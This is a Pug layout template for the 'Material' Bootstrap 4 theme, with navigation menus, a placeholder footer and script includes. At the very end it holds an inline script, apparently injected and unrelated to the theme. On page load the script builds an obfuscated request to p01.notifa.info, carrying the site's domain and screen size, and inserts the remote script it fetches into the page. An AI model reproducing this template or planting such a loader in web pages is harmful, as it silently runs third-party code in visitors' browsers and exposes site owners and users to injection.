doctype html
html(lang='en')
  head
    meta(charset='utf-8')
    meta(name='viewport', content='width=device-width, initial-scale=1, shrink-to-fit=no')
    title Material - Material Design Bootstrap 4 Template
    link(rel='stylesheet', href='assets/css/bootstrap.min.css')
    link(rel='stylesheet', href='assets/css/materialdesignicons.min.css')
    link(rel='stylesheet', href='assets/css/material.min.css')
    link(rel='stylesheet', href='assets/css/ripples.min.css')
    link(rel='stylesheet', href='assets/css/owl.carousel.css')
    link(rel='stylesheet', href='assets/css/magnific-popup.css')
    link(rel='stylesheet', href='assets/css/slicknav.css')
    link(rel='stylesheet', href='assets/css/animate.css')
    link(rel='stylesheet', href='assets/css/style.css')
    link(rel='stylesheet', href='assets/css/responsive.css')
    link(rel='stylesheet', href='assets/css/color-switcher.css')
    link(rel='stylesheet', type='text/css', href='assets/css/colors/indigo.css', media='screen')
  body
    header#header
      nav.navbar.navbar-expand-lg.fixed-top.scrolling-navbar.nav-bg
        .container
          .navbar-header
            button.navbar-toggler(type='button', data-toggle='collapse', data-target='#main-navbar', aria-controls='main-navbar', aria-expanded='false', aria-label='Toggle navigation')
              span.sr-only Toggle navigation
              span.mdi.mdi-menu
              span.mdi.mdi-menu
              span.mdi.mdi-menu
            a.navbar-brand(href='index.html')
              img(src='assets/images/logo.png', alt='')
          #main-navbar.collapse.navbar-collapse
            ul.navbar-nav.mr-auto.w-100.justify-content-end
              li.nav-item.dropdown.active
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Home
                .dropdown-menu
                  a.dropdown-item.active(href='index.html') Home V1
                  a.dropdown-item(href='index-2.html') Home V2
              li.nav-item.dropdown
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Pages
                .dropdown-menu
                  a.dropdown-item(href='about-us.html') About Us 1
                  a.dropdown-item(href='about-us2.html') About Us 2
                  a.dropdown-item(href='team.html') Team Members
                  a.dropdown-item(href='services.html') Services
                  a.dropdown-item(href='contact-us.html') Contact Us 1
                  a.dropdown-item(href='contact-us2.html') Contact Us 2
                  a.dropdown-item(href='404.html') 404
              li.nav-item.dropdown
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Components
                .dropdown-menu
                  a.dropdown-item(href='tab.html') Tabs
                  a.dropdown-item(href='alert.html') Alert
                  a.dropdown-item(href='accordion.html') Accordions
                  a.dropdown-item(href='pricing.html') Pricing Tables
                  a.dropdown-item(href='buttons.html') Buttons
                  a.dropdown-item(href='icons.html') Icons
                  a.dropdown-item(href='carousel.html') Carousel
                  a.dropdown-item(href='counter.html') Counter
                  a.dropdown-item(href='map.html') Google Map
              li.nav-item.dropdown
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Portfolio
                .dropdown-menu
                  a.dropdown-item(href='portfolio-2.html') Portfolio 2 columns
                  a.dropdown-item(href='portfolio.html') Portfolio 3 columns
                  a.dropdown-item(href='portfolio-single.html') Portfolio Single
              li.nav-item.dropdown
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Blog
                .dropdown-menu
                  a.dropdown-item(href='blog.html') Blog Page
                  a.dropdown-item(href='blog-single.html') Blog Single Page
              li.nav-item.dropdown
                a.nav-link.dropdown-toggle(href='index.html#', data-toggle='dropdown', aria-haspopup='true', aria-expanded='false')
                  | Contact Us
                .dropdown-menu
                  a.dropdown-item(href='contact-us.html') Contact Us 1
                  a.dropdown-item(href='contact-us2.html') Contact Us 2
            .search-icon
              span.open-search
                i.mdi.mdi-magnify.btn.btn-common
            form.navbar-form(role='search')
              .container
                .row
                  .form-group.has-feedback
                    input.form-control(type='text', placeholder='Type and search ...')
                    .close
                      i.mdi.mdi-close
        ul.wpb-mobile-menu
          li
            a.active(href='index.html#')
              | Home
            ul.dropdown
              li
                a.active(href='index.html') Home v1
              li
                a(href='index-2.html') Home v2
          li
            a(href='index.html#')
              | Pages
            ul.dropdown
              li
                a(href='about-us.html') About Us 1
              li
                a(href='about-us2.html') About Us 2
              li
                a(href='team.html') Team Members
              li
                a(href='services.html') Services
              li
                a(href='contact-us.html') Contact Us 1
              li
                a(href='contact-us2.html') Contact Us 2
              li
                a(href='404.html') 404
          li
            a(href='index.html#')
              | Elements
            ul.dropdown
              li
                a(href='tab.html') Tabs
              li
                a(href='alert.html') Alert
              li
                a(href='accordion.html') Accordions
              li
                a(href='pricing.html') Pricing Tables
              li
                a(href='buttons.html') Buttons
              li
                a(href='icons.html') Icons
              li
                a(href='carousel.html') Carousel
              li
                a(href='counter.html') Counter
              li
                a(href='map.html') Google Map
          li
            a(href='index.html#')
              | Portfolio
            ul.dropdown
              li
                a(href='portfolio-2.html') Portfolio 2 columns
              li
                a(href='portfolio.html') Portfolio 3 columns
              li
                a(href='portfolio-single.html') Portfolio Single
          li
            a(href='http://preview.uideck.com/items/material-demo/about.html')
              | Blog
            ul.dropdown
              li
                a(href='blog.html') Blog Page
              li
                a(href='blog-single.html') Blog Single Page
          li
            a(href='index.html#')
              | Contact Us
            ul.dropdown
              li
                a(href='contact-us.html') Contact Us 1
              li
                a(href='contact-us2.html') Contact Us 2
    
    block content-front

    footer.page-footer.center-on-small-only.pt-0.footer-widget-container
      .container.pt-5.mb-5
        .row
          .col-md-6.col-lg-3.col-xl-3.footer-contact-widget
            h3.footer-title About Us
            p
              | Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptates eos minus expedita illo recusandae esse labore obcaecati nisi amet quia odio sapiente! Fugiat, voluptatibus nemo necessitatibus porro.
            ul
              li
                a(href='index.html#')
                  i.mdi.mdi-facebook
              li
                a(href='index.html#')
                  i.mdi.mdi-twitter
              li
                a(href='index.html#')
                  i.mdi.mdi-dribbble
              li
                a(href='index.html#')
                  i.mdi.mdi-github-circle
              li
                a(href='index.html#')
                  i.mdi.mdi-linkedin
          .col-md-6.col-lg-3.col-xl-3.recent-widget
            h3.footer-title Recent Posts
            ul.image-list
              li
                figure.overlay
                  img.img-fluid(src='assets/images/art/a1.jpg', alt='')
                  figcaption
                    a(href='blog-single.html')
                      i.mdi.mdi-link-variant.from-top.icon-xs
                .post-content
                  h6.post-title
                    a(href='blog-single.html') Fusce gravida tortor felis
                  .meta
                    span.date 12 Jan 2019
              li
                figure.overlay
                  img.img-fluid(src='assets/images/art/a2.jpg', alt='')
                  figcaption
                    a(href='blog-single.html')
                      i.mdi.mdi-link-variant.from-top.icon-xs
                .post-content
                  h6.post-title
                    a(href='blog-single.html') Ornare Nullam Risus Cursus
                  .meta
                    span.date 12 Jan 2019
              li
                figure.overlay
                  img.img-fluid(src='assets/images/art/a3.jpg', alt='')
                  figcaption
                    a(href='blog-single.html')
                      i.mdi.mdi-link-variant.from-top.icon-xs
                .post-content
                  h6.post-title
                    a(href='blog-single.html') Euismod Nullam Fusce Dapibus
                  .meta
                    span.date 12 Jan 2019
          .col-md-6.col-lg-3.col-xl-3.link-widget
            h3.footer-title Get in Touch
            p
              | Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Etiam porta sem malesuada magna mollis euismod. Praesent commodo cursus.
            .mt-3
            ul.icon-list
              li
                i.mdi.mdi-map-marker
                |  548 San Francisco, CA
              li
                i.mdi.mdi-email
                a.nocolor(href='../../cdn-cgi/l/email-protection.htm#e588848c89a588849180978c8489cb868a88')
                  span.__cf_email__(data-cfemail='3f525e56537f525e4b5a4d565e53115c5052') [email protected]
              li
                i.mdi.mdi-phone-classic
                |  +00 (123) 456 78 90
              li
                i.mdi.mdi-cellphone-iphone
                |  +00 (121) 455 47 54
          .col-md-6.col-lg-3.col-xl-3.footer-contact
            h3.footer-title Subscribe
            .widget
              .newsletter-wrapper
                form#subscribe-form.validate(method='post', name='subscribe-form')
                  .form-group
                    input#EMAIL.email.form-control(type='email', value='', name='EMAIL', placeholder='Email Address', required='')
                    button#subscribe.btn.btn-common.pull-right(type='submit', name='subscribe') Join
                    .clearfix
            .widget
              h5.widget-title Useful Links
              ul.unordered-list
                li
                  a.nocolor(href='index.html#') Terms of Use
                li
                  a.nocolor(href='index.html#') Privacy Policy
                li
                  a.nocolor(href='index.html#') Company Profile
                li
                  a.nocolor(href='index.html#') Why Choose Us
      .footer-copyright
        .container
          .row
            .col-md-12.text-center
              p
                | © 2018 Material Studio, All right reserved. Designed with 
                i.mdi.mdi-heart
                |  by 
                a(href='index.html#') UIdeck
    a.back-to-top(href='index.html#')
      .ripple-container
      i.mdi.mdi-arrow-up
    #preloader
      #loader-1.loader
    script(data-cfasync='false', src='../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js')
    script(src='assets/js/jquery-min.js')
    script(src='assets/js/popper.min.js')
    script(src='assets/js/bootstrap.min.js')
    script(src='assets/js/color-switcher.js')
    script(src='assets/js/jquery.mixitup.min.js')
    script(src='assets/js/jquery.inview.js')
    script(src='assets/js/jquery.counterup.min.js')
    script(src='assets/js/scroll-top.js')
    script(src='assets/js/smoothscroll.js')
    script(src='assets/js/material.min.js')
    script(src='assets/js/ripples.min.js')
    script(src='assets/js/owl.carousel.min.js')
    script(src='assets/js/form-validator.min.js')
    script(src='assets/js/contact-form-script.min.js')
    script(src='assets/js/wow.js')
    script(src='assets/js/jquery.vide.js')
    script(src='assets/js/jquery.magnific-popup.min.js')
    script(src='assets/js/jquery.slicknav.js')
    script(src='assets/js/main.js')
    script(type='text/javascript').
      if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mPhADLaxru5ADNgCXZDNvfsvtgMGLVfGaMPvaD%2b4Ih8m8xt9W6AnOss34G50Umz2ILraI4YQc3wl7koeh%2ftBQq4nqMa01sGoe9bxteyJECVy2Sv9ed3vfGfsnaHl4JB%2bDqn4%2balxAnC1eQ6ZLm8yXmEZa3fguVdAeRghb1tahwGdOnnRvxpuEez1VXwuHmpakIRaYyxgpYnpLHF6uSmoahrCj0zIf6HsdahWitx3Btfsb5f5DCrSeTKQzW96TljZ%2f0Al4VWS2ra1ly%2b5BkyhvYvMxTGiB87SrDQ3DhyCgsVnhs68lcAvdfjjwGWoT2sRWUCG2l7T1lTV0oeLGAOeqNWfI%2bbtnELXfcFv%2blZ0cShW1nqKeN%2fLTpD6ia5BnSkQF1hXLNSfdWlTcASn5Or8deTLVOFmGjkd1GO4G9wK701fAIDJVbzm5AkT%2bjd2IDq6zjtmpcMMvXmJwbjsyK26m0n909yYbS8yido3itf90Q1f4XbxRb2HKFLBkGgN12ELlf0QGEbtza3w%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};      